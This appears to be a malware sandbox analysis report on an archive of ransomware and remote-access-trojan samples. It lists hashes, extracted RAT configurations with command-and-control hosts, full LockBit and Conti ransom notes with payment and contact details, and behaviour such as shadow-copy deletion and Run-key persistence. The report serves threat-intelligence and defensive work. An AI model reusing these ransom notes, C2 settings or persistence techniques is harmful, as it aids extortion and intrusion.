asyncrat | d6e60bdbc528eef42fe9cee8573182c082fbe9ebe171e02583c6ac17cd70654c

Analysis

max time kernel
94s
max time network
320s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
02-10-2024 17:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

RNSM00469.7z
Size

92.5MB
MD5

d9cde79253e9c9f505bfd4e8d1f38895
SHA1

1b164434c51378c9c5e991b9f5d15b4051b8eb74
SHA256

d6e60bdbc528eef42fe9cee8573182c082fbe9ebe171e02583c6ac17cd70654c
SHA512

74ba4b9434fe16c49b1b0db0cd7ce635f80e55d30a2508ee810f2749c25864b7469b2068597cacd80eab8adbcc9e401fb0881909d33b38592d210b4cf2c5e7c0
SSDEEP

1572864:np46tVvgzRf5DFNmjzgVwbDe7PV0ra03alwike+nIUJI7DRAxql/:npHn+R5hNm3W57CraLK7ZJI7mUB

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\DECRYPT-FILES.TXT

Ransom Note

Ooops! All your important files are encrypted! [+] What happend to my computer? [+] All your important files are encrypted. No one can help you to restore files without our special decryptor. Backups were either encrypted or deleted. Shadow copies also removed. If you want to restore some of your files for free write to email (contact is below) and attach 2-3 encrypted files. You will receive decrypted samples. To decrypt other files you have to pay $250. [+] How do i pay? [+] Payment is accepted in Bitcoin only. Please check the current price of Bitcoin and buy some Bitcoins. And send the correct amount to the address specified at the bottom. [+] How can i contact? [+] 1.Download Tor browser (https://www.torproject.org/) 2.Create account on mail2tor (http://mail2tor2zyjdctd.onion/) 3.Write email to us ([email protected]) If you can't use tor in your country you can write to us on our temporary email address. [+] What if i already paid? [+] Send your Bitcoin wallet ID to e-mail provided above. Attention! 1.Do not modify encrypted files. 2.Do not try decrypt your data using third party software. 3.Do not turn off your computer. Our bitcoin address: bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe Our temporary e-mail address: [email protected]

Emails

[email protected]

URLs

http://mail2tor2zyjdctd.onion/

Extracted

Path

C:\Program Files\dotnet\Restore-My-Files.txt

Ransom Note

LockBit 2.0 Ransomware Your data are stolen and encrypted The data will be published on TOR website http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion and https://bigblog.at if you do not pay the ransom You can contact us and decrypt one file for free on these TOR sites http://lockbitsup4yezcd5enk5unncx3zcy7kw6wllyqmiyhvanjj352jayid.onion http://lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did.onion OR https://decoding.at Decryption ID: 06086A327A199F1432F7EDC6B4EA63FC

URLs

http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion

https://bigblog.at

http://lockbitsup4yezcd5enk5unncx3zcy7kw6wllyqmiyhvanjj352jayid.onion

http://lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did.onion

https://decoding.at

Extracted

Path

C:\ProgramData\readme.txt

Family

conti

Ransom Note

All of your files are currently encrypted by CONTI ransomware. If you try to use any additional recovery software - the files might be damaged or lost. To make sure that we REALLY CAN recover data - we offer you to decrypt samples. You can contact us for further instructions through: Our website TOR VERSION : (you should download and install TOR browser first https://torproject.org) http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/ HTTPS VERSION : https://contirecovery.click YOU SHOULD BE AWARE! Just in case, if you try to ignore us. We've downloaded your data and are ready to publish it on out news website if you do not respond. So it will be better for both sides if you contact us ASAP. ---BEGIN ID--- 0Y2bUdHGJV86rTP8Tu27AgfN91oYLnc2GES6JjNUJY6Wy4r1DIzS2E7P7QpX2VVe ---END ID---

URLs

http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/

https://contirecovery.click

Extracted

Family

njrat

Version

im523

Botnet

gandigod.ddns.net:5554

rlawlsl154.codns.com:443

Mutex

217aaa3e47058dda7bd3f2dce8cd4382

Attributes

reg_key
217aaa3e47058dda7bd3f2dce8cd4382
splitter
|'|'|

Extracted

Family

nanocore

Version

1.2.2.0

eset-antivirus.ydns.eu:5498

Mutex

754b0562-5f0b-4af6-9aab-54f90541ccf5

Attributes

activate_away_mode
true
backup_connection_host
eset-antivirus.ydns.eu
backup_dns_server
eset-antivirus.ydns.eu
buffer_size
65535
build_time
2021-06-18T06:38:45.233225836Z
bypass_user_account_control
false
bypass_user_account_control_data
PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTE2Ij8+DQo8VGFzayB2ZXJzaW9uPSIxLjIiIHhtbG5zPSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmRvd3MvMjAwNC8wMi9taXQvdGFzayI+DQogIDxSZWdpc3RyYXRpb25JbmZvIC8+DQogIDxUcmlnZ2VycyAvPg0KICA8UHJpbmNpcGFscz4NCiAgICA8UHJpbmNpcGFsIGlkPSJBdXRob3IiPg0KICAgICAgPExvZ29uVHlwZT5JbnRlcmFjdGl2ZVRva2VuPC9Mb2dvblR5cGU+DQogICAgICA8UnVuTGV2ZWw+SGlnaGVzdEF2YWlsYWJsZTwvUnVuTGV2ZWw+DQogICAgPC9QcmluY2lwYWw+DQogIDwvUHJpbmNpcGFscz4NCiAgPFNldHRpbmdzPg0KICAgIDxNdWx0aXBsZUluc3RhbmNlc1BvbGljeT5QYXJhbGxlbDwvTXVsdGlwbGVJbnN0YW5jZXNQb2xpY3k+DQogICAgPERpc2FsbG93U3RhcnRJZk9uQmF0dGVyaWVzPmZhbHNlPC9EaXNhbGxvd1N0YXJ0SWZPbkJhdHRlcmllcz4NCiAgICA8U3RvcElmR29pbmdPbkJhdHRlcmllcz5mYWxzZTwvU3RvcElmR29pbmdPbkJhdHRlcmllcz4NCiAgICA8QWxsb3dIYXJkVGVybWluYXRlPnRydWU8L0FsbG93SGFyZFRlcm1pbmF0ZT4NCiAgICA8U3RhcnRXaGVuQXZhaWxhYmxlPmZhbHNlPC9TdGFydFdoZW5BdmFpbGFibGU+DQogICAgPFJ1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+ZmFsc2U8L1J1bk9ubHlJZk5ldHdvcmtBdmFpbGFibGU+DQogICAgPElkbGVTZXR0aW5ncz4NCiAgICAgIDxTdG9wT25JZGxlRW5kPmZhbHNlPC9TdG9wT25JZGxlRW5kPg0KICAgICAgPFJlc3RhcnRPbklkbGU+ZmFsc2U8L1Jlc3RhcnRPbklkbGU+DQogICAgPC9JZGxlU2V0dGluZ3M+DQogICAgPEFsbG93U3RhcnRPbkRlbWFuZD50cnVlPC9BbGxvd1N0YXJ0T25EZW1hbmQ+DQogICAgPEVuYWJsZWQ+dHJ1ZTwvRW5hYmxlZD4NCiAgICA8SGlkZGVuPmZhbHNlPC9IaWRkZW4+DQogICAgPFJ1bk9ubHlJZklkbGU+ZmFsc2U8L1J1bk9ubHlJZklkbGU+DQogICAgPFdha2VUb1J1bj5mYWxzZTwvV2FrZVRvUnVuPg0KICAgIDxFeGVjdXRpb25UaW1lTGltaXQ+UFQwUzwvRXhlY3V0aW9uVGltZUxpbWl0Pg0KICAgIDxQcmlvcml0eT40PC9Qcmlvcml0eT4NCiAgPC9TZXR0aW5ncz4NCiAgPEFjdGlvbnMgQ29udGV4dD0iQXV0aG9yIj4NCiAgICA8RXhlYz4NCiAgICAgIDxDb21tYW5kPiIjRVhFQ1VUQUJMRVBBVEgiPC9Db21tYW5kPg0KICAgICAgPEFyZ3VtZW50cz4kKEFyZzApPC9Bcmd1bWVudHM+DQogICAgPC9FeGVjPg0KICA8L0FjdGlvbnM+DQo8L1Rhc2s+
clear_access_control
true
clear_zone_identifier
false
connect_delay
4000
connection_port
5498
default_group
Default
enable_debug_mode
true
gc_threshold
1.048576e+07
keep_alive_timeout
30000
keyboard_logging
false
lan_timeout
2500
max_packet_size
1.048576e+07
mutex
754b0562-5f0b-4af6-9aab-54f90541ccf5
mutex_timeout
5000
prevent_system_sleep
false
primary_connection_host
eset-antivirus.ydns.eu
primary_dns_server
eset-antivirus.ydns.eu
request_elevation
true
restart_delay
5000
run_delay
0
run_on_startup
false
set_critical_process
true
timeout_interval
5000
use_custom_dns_server
false
version
1.2.2.0
wan_timeout
8000

Extracted

Family

asyncrat

Version

0.5.7B

Botnet

GTA

selldrugs.duckdns.org:4782

Mutex

frdsadgdgdhdsadassa

Attributes

delay
3
install
false
install_file
System.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Contains code to disable Windows Defender 2 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

Processes:

resource	yara_rule
C:\Users\Admin\Desktop\00469\HEUR-Trojan-Ransom.MSIL.Agent.gen-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe	disable_win_def
behavioral1/memory/2684-188-0x00000000005A0000-0x0000000000A16000-memory.dmp	disable_win_def

Conti Ransomware
Ransomware generally thought to be a successor to Ryuk.
ransomware conti
Maze
Ransomware family also known as ChaCha.
trojan ransomware maze
NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
keylogger trojan stealer spyware nanocore
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

VSSVC.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ VSSVC.exe
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

4552 bcdedit.exe
9540 bcdedit.exe
Modifies Windows Firewall 2 TTPs 6 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exe

pid process

8052 netsh.exe
3980 netsh.exe
7164 netsh.exe
3000 netsh.exe
1208 netsh.exe
7540 netsh.exe
Possible privilege escalation attempt 5 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exetakeown.exe

pid process

6192 takeown.exe
9636 icacls.exe
9588 takeown.exe
6628 icacls.exe
8344 takeown.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	VSSVC.exe

pid	process
4552	bcdedit.exe
9540	bcdedit.exe

pid	process
8052	netsh.exe
3980	netsh.exe
7164	netsh.exe
3000	netsh.exe
1208	netsh.exe
7540	netsh.exe

pid	process
6192	takeown.exe
9636	icacls.exe
9588	takeown.exe
6628	icacls.exe
8344	takeown.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

VSSVC.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	VSSVC.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	VSSVC.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.exeHEUR-Trojan-Ransom.MSIL.Agent.gen-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-c65fc0a1d2472b184f1a25c04fd320428ad06c35c56185b62298be269b1a400c.exeHEUR-Trojan-Ransom.Win32.Blocker.pef-c7030efe8c2095f68a46c5daf270c5fd3ac4ca6dcc603a40e7f6f3caea875297.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.MSIL.Agent.gen-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.MSIL.Blocker.gen-c65fc0a1d2472b184f1a25c04fd320428ad06c35c56185b62298be269b1a400c.exe
Key value queried	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation	HEUR-Trojan-Ransom.Win32.Blocker.pef-c7030efe8c2095f68a46c5daf270c5fd3ac4ca6dcc603a40e7f6f3caea875297.exe

Executes dropped EXE 14 IoCs

Processes:

HEUR-Trojan-Ransom.MSIL.Agent.gen-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-9da3683e25e6a04588ed2a186829c6baf338c949e1db0fbb25ab9a3ec48cb210.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-a0ff1900e48cae4ae82ab1afb5a448fef40372f6c1d81a2c2896fd4ce8fd2915.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-c65fc0a1d2472b184f1a25c04fd320428ad06c35c56185b62298be269b1a400c.exeHEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exeHEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exeHEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exeVSSVC.exeHEUR-Trojan-Ransom.Win32.Blocker.pef-c7030efe8c2095f68a46c5daf270c5fd3ac4ca6dcc603a40e7f6f3caea875297.exezbhnd.exeHEUR-Trojan-Ransom.Win32.Crypmodadv.vho-b7549a6bb57efedcb6b536da95fb3c06505f54fb459188d7ea5862794f9cf2be.exeHEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exeHEUR-Trojan-Ransom.Win32.Cryptoff.vho-eb287a1ad0e98620720ec6d9ed9c03c5af91da62623f3dd18f4edf0c389742c3.exeHEUR-Trojan-Ransom.Win32.Cryptor.gen-d338295d50d5b39d8377c593f6d46feb512823e2724704448cc885b40c5056e0.exe

pid	process
2684	HEUR-Trojan-Ransom.MSIL.Agent.gen-ef95c0b829c2aad4eca365fb9b37719b51f5d8ab518a2ccac920ef65852982d1.exe
2588	HEUR-Trojan-Ransom.MSIL.Blocker.gen-9da3683e25e6a04588ed2a186829c6baf338c949e1db0fbb25ab9a3ec48cb210.exe
384	HEUR-Trojan-Ransom.MSIL.Blocker.gen-a0ff1900e48cae4ae82ab1afb5a448fef40372f6c1d81a2c2896fd4ce8fd2915.exe
4532	HEUR-Trojan-Ransom.MSIL.Blocker.gen-c65fc0a1d2472b184f1a25c04fd320428ad06c35c56185b62298be269b1a400c.exe
2524	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
3800	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
5112	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5048	VSSVC.exe
5152	HEUR-Trojan-Ransom.Win32.Blocker.pef-c7030efe8c2095f68a46c5daf270c5fd3ac4ca6dcc603a40e7f6f3caea875297.exe
4016	zbhnd.exe
5892	HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-b7549a6bb57efedcb6b536da95fb3c06505f54fb459188d7ea5862794f9cf2be.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5164	HEUR-Trojan-Ransom.Win32.Cryptoff.vho-eb287a1ad0e98620720ec6d9ed9c03c5af91da62623f3dd18f4edf0c389742c3.exe
5144	HEUR-Trojan-Ransom.Win32.Cryptor.gen-d338295d50d5b39d8377c593f6d46feb512823e2724704448cc885b40c5056e0.exe

Loads dropped DLL 60 IoCs

Processes:

HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exeHEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe

pid	process
3800	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
3800	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
3800	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
3800	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
3800	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
3800	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
3800	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
3800	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
3800	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
3800	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
3800	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
3800	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
3800	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
3800	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
3800	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
3800	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
3800	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
3800	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
3800	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
3800	HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe
5764	HEUR-Trojan-Ransom.Python.Agent.gen-05a894f06c3083e872bf4372700f72b7d58c7c8dd90a99ca25e0441c4dd703c1.exe

Modifies file permissions 1 TTPs 5 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exetakeown.exe

pid process

6192 takeown.exe
9636 icacls.exe
9588 takeown.exe
6628 icacls.exe
8344 takeown.exe

pid	process
6192	takeown.exe
9636	icacls.exe
9588	takeown.exe
6628	icacls.exe
8344	takeown.exe

Obfuscated with Agile.Net obfuscator 2 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

Processes:

resource	yara_rule
behavioral1/memory/2588-1993-0x0000000006F40000-0x0000000006F68000-memory.dmp	agile_net
behavioral1/memory/7848-15906-0x0000000008FC0000-0x0000000009026000-memory.dmp	agile_net

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\VSSVC.exe	themida
behavioral1/memory/5048-749-0x0000000000710000-0x0000000000F84000-memory.dmp	themida
behavioral1/memory/5048-807-0x0000000000710000-0x0000000000F84000-memory.dmp	themida

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

HEUR-Trojan-Ransom.MSIL.Blocker.gen-a0ff1900e48cae4ae82ab1afb5a448fef40372f6c1d81a2c2896fd4ce8fd2915.exeHEUR-Trojan-Ransom.Win32.Cryptoff.vho-eb287a1ad0e98620720ec6d9ed9c03c5af91da62623f3dd18f4edf0c389742c3.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater = "C:\\Users\\Admin\\AppData\\Local\\Updater.exe"	HEUR-Trojan-Ransom.MSIL.Blocker.gen-a0ff1900e48cae4ae82ab1afb5a448fef40372f6c1d81a2c2896fd4ce8fd2915.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kht6dzxyq4 = "C:\\Users\\Admin\\Desktop\\00469\\HEUR-Trojan-Ransom.Win32.Cryptoff.vho-eb287a1ad0e98620720ec6d9ed9c03c5af91da62623f3dd18f4edf0c389742c3.exe"	HEUR-Trojan-Ransom.Win32.Cryptoff.vho-eb287a1ad0e98620720ec6d9ed9c03c5af91da62623f3dd18f4edf0c389742c3.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

VSSVC.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA VSSVC.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

4244 powershell.exe
3160 powershell.exe
2900 powershell.exe
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	VSSVC.exe

pid	process
4244	powershell.exe
3160	powershell.exe
2900	powershell.exe

Drops desktop.ini file(s) 1 IoCs

Processes:

HEUR-Trojan-Ransom.Python.Agent.a-7c06685f1a0ec95c47ff287cbc0b20aa5c35d4f37f21bd7f8e4b8da8641a4c75.exe

description	ioc	process
